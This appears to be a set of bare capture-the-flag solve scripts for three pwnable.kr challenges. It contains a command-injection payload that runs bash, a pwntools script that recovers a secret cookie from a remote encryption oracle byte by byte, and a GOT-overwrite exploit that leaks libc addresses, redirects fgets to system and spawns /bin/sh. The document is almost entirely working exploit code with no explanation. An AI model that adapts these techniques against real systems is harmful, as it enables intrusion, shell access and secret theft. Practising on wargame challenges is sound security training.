1.loveletter
solve
payload = 'nv sh -c bash ' + 'A' * (256 - 14 - 2 - 1) + '|\x01'
2.crypto1
solve
from pwn import *
cookie=''
t='1234567890abcdefghijklmnopqrstuvwxyz-_'
def getmessage(message):
p=remote('pwnable.kr',9006)
p.recvuntil('ID\n')
p.sendline(str(message))
p.recvuntil('PW\n')
p.sendline()
p.recvuntil('sending encrypted data (')
data=p.recvuntil(')')[:-1]
p.close()
return data
def getcookie(n):
global cookie
s='-'*(62-n%64)
s1=getmessage(s)
s1=s1[96:128]
for i in t:
s='-'*(63-len(cookie))+cookie+i
s2=getmessage(s)
s2=s2[96:128]
if s1==s2:
cookie+=i
print(cookie)
break
for i in range(1,64):
getcookie(i)
3.bf
solve
#encoding=utf-8
from pwn import *
s=process('./bf')
#s=remote('pwnable.kr',9001)
context.terminal = ['tmux', 'splitw', '-h']
breakpoints=[ 0x08048648]
#gdb.attach(s,gdbscript='\n'.join(['b *'+str(x) for x in breakpoints])+'c 5\n')
#libc = ELF('./bf_libc.so')
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
context.log_level='debug'
s.recvlines(2)
p=0x0804A0A0
putchar=0x0804a030
memset=0x0804a02c
fgets=0x0804a010
main_addr=0x8048671
payload=''
#move putchar+4
payload+='<'*(p-(putchar+4))
#leak putchar
payload+='.<'*4+'.'
#overwrite putchar to main
payload+=',>'*4
#move fgets
payload+='<'*(putchar+4-fgets)
#overwrite fgets to system
payload+=',>'*4
#move memset
payload+='>'*(memset-fgets-4)
#overwrite memset to fgets
payload+=',>'*4
#run putchar()-> main ->
payload+='.'
s.sendline(payload)
s.recv(1)
putchar_addr=u32(s.recv(4),endianness='big')
log.info('putchar_addr:'+hex(putchar_addr))
system_addr=putchar_addr-libc.symbols['putchar']+libc.symbols['system']
gets_addr=putchar_addr-libc.symbols['putchar']+libc.symbols['gets']
s.send(p32(main_addr))
s.send(p32(system_addr))
s.send(p32(gets_addr))
s.sendline('/bin/sh\x00')
s.interactive()
raw_input()
